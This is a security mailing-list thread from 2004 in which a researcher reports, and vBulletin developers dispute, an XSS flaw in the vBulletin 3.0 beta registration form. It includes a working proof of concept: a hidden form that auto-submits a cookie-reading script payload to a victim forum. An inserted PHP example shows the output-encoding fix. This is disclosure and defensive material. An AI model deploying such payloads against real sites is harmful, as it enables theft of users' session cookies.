Vulnerability Development mailing list archives
RE: vBulletin Security Vulnerability - POC
From: "Ferruh Mavituna" <ferruh () mavituna com>
Date: Fri, 23 Jan 2004 23:34:43 +0200
I'm sending proof of concept again [ http://ferruh.mavituna.com/article/?256 - 06.08.2003 ]; test this code in forums which use "vBulletin v3.0.0 Beta 7". Most of them are vulnerable. I discovered this in "Beta 2" about 3 months ago.

---------------------------------------------------------------
PROOF OF CONCEPT;
---------------------------------------------------------------

<form action="http://[VICTIM - FORUM PATH]/register.php?do=register" method="post" style="display:none">
<input type="hidden" name="s" value="" />
<input type="hidden" name="regtype" value="1" />
<input type="text" class="bginput" name="field1" value="" size="25" maxlength="250" />
<input type="hidden" name="url" value="index.php" />
<input type="hidden" name="do" value="addmember" />
</form>
<script>
//Code that will be executed
var xss = "\"><script>alert(document"+".cookie)<\/script>";
document.forms(0).field1.value=xss;
document.forms(0).submit();
</script>

---------------------------------------------------------------

---------------------------------------------------------------
Current vulnerable versions;
---------------------------------------------------------------
vBulletin 3.0 Beta 2 <-> Beta 7 (If they have the standard / quick registration option)

Ferruh.Mavituna
http://feruh.mavituna.com
PGPKey : http://ferruh.mavituna.com/PGPKey.asc

-----Original Message-----
From: Scott MacVicar [mailto:scott () vbulletin com]
Sent: Friday, January 23, 2004 8:10 PM
To: ferruh () mavituna com
Cc: kier () vbulletin com; vuln-dev () securityfocus com
Subject: RE: vBulletin Security Vulnerability

Hello,

The issue you are now reporting is for a completely different version. And it's not even the same problem. vBulletin 3 and vBulletin 2 are different code bases and again the issue that you are trying to identify is not present.
----------------------------
[root@devbox vb3b7]# grep -rna "regtype" *
install/vbulletin-style.xml:6866:<input type="hidden" name="regtype" value="1" />
install/vbulletin-style.xml:7728: <input type="hidden" name="regtype" value="2" />
install/vbulletin-style.xml:12018: <label for="rb_regtype_1"><input type="radio" name="regtype" value="1" id="rb_regtype_1" checked="checked" /><b>Standard</b> - Normal, full length registration form.</label><br />
install/vbulletin-style.xml:12019: <label for="rb_regtype_2"><input type="radio" name="regtype" value="2" id="rb_regtype_2" /><b>Quick</b> - Shorter, but less option-filled registration form.</label><br />
install/vbulletin-style.xml:12094: <label for="rb_regtype_1"><input type="radio" name="regtype" value="1" id="rb_regtype_1" checked="checked" /><b>Standard</b> - Normal, full length registration form.</label><br />
install/vbulletin-style.xml:12095: <label for="rb_regtype_2"><input type="radio" name="regtype" value="2" id="rb_regtype_2" /><b>Quick</b> - Shorter, but less option-filled registration form.</label>
register.php:1302: if ($_REQUEST['regtype'] == 2)
----------------------------

As you can see above, the only time the variable regtype is referenced is within the register.php code, and it's a comparison and not directly outputted. The regtype was removed after Beta 7 for a new registration method.

----------------------
Scott MacVicar
Developer, vBulletin
-----Original Message-----
From: Ferruh Mavituna [mailto:ferruh () mavituna com]
Sent: 23 January 2004 05:07
To: 'Kier Darby'; vuln-dev () securityfocus com
Subject: RE: vBulletin Security Vulnerability

Hello;

This must be an option or something like that in the new vBulletin. After a small search on Google you can find all "vBulletin v3.0.0 Beta 7" forums.

---------------------------------------------------------------
"We can only assume that this vulnerability was found in a site running code modified from that supplied by Jelsoft."
---------------------------------------------------------------

Not "a site", most of them are vulnerable. If you provide this customization, yes, vBulletin is not vulnerable, but "Jelsoft customizations" are vulnerable. And most of these forums have the register.php "Standard / Quick" selection and the "regtype" hidden field. Almost 80% of your customers are vulnerable.

Ferruh.Mavituna
http://feruh.mavituna.com
PGPKey : http://ferruh.mavituna.com/PGPKey.asc

-----Original Message-----
From: Kier Darby [mailto:kier () vbulletin com]
Sent: Wednesday, January 21, 2004 10:36 PM
To: vuln-dev () securityfocus com
Subject: Re: vBulletin Security Vulnerability
In-Reply-To: <20040120190824.GA4674 () natalya rebby com>

No patch has been issued for this 'vulnerability' because no vulnerability exists. There is no hidden field called "reg_site", nor any $reg_site variable anywhere in the vBulletin 2 or vBulletin 3 source code or templates, nor has it ever existed. We can only assume that this vulnerability was found in a site running code modified from that supplied by Jelsoft.
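The bug class the proof of concept above exercises, shown from the defender's side as an added example that is not vBulletin's code: a submitted registration value reflected into an HTML attribute without encoding, beside the encoded form that neutralises the same payload. Only the field name field1 and the payload string come from the POC; the function names and the rendering around them are assumptions.

```php
<?php
// Added example, not vBulletin code. Demonstrates why a registration field
// that is echoed back into a form is an XSS sink unless it is HTML-encoded
// for the attribute context it lands in.

// Vulnerable pattern: the submitted value is concatenated verbatim into the
// value="..." attribute. A value beginning with  ">  closes the attribute and
// the <input> tag, so whatever follows is parsed as new markup.
function render_field_unsafe(string $submitted): string
{
    return '<input type="text" name="field1" value="' . $submitted . '" />';
}

// Hardened pattern: encode for the HTML attribute context.
// ENT_QUOTES encodes both " and ' so the attribute cannot be terminated early;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string,
// which would otherwise silently drop the field.
function render_field_safe(string $submitted): string
{
    $escaped = htmlspecialchars($submitted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="field1" value="' . $escaped . '" />';
}

// Constructed input mirroring the payload the POC writes into field1.
$payload = '"><script>alert(document.cookie)</script>';

// In the unsafe rendering the <script> element survives intact and the browser
// executes it; in the safe rendering every < > and " becomes an entity, so the
// whole payload is displayed as the literal text of the input's value.
echo render_field_unsafe($payload), PHP_EOL;
echo render_field_safe($payload), PHP_EOL;
```

Encoding must match the context the value lands in: the same payload placed inside a JavaScript string or a URL needs a different encoder, and a check in register.php that only compares regtype (as in the grep output above) says nothing about whether field1 is encoded on output.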
Current thread:
- vBulletin Security Vulnerability gcf (Jan 20)
- Re: vBulletin Security Vulnerability Curt Rebelein Junior (Jan 21)
- Re: vBulletin Security Vulnerability Curt Rebelein Junior (Jan 21)
- RE: vBulletin Security Vulnerability Ferruh Mavituna (Jan 21)
- <Possible follow-ups>
- Re: vBulletin Security Vulnerability Kier Darby (Jan 22)
- RE: vBulletin Security Vulnerability Ferruh Mavituna (Jan 23)
- RE: vBulletin Security Vulnerability Scott MacVicar (Jan 23)
- RE: vBulletin Security Vulnerability - POC Ferruh Mavituna (Jan 26)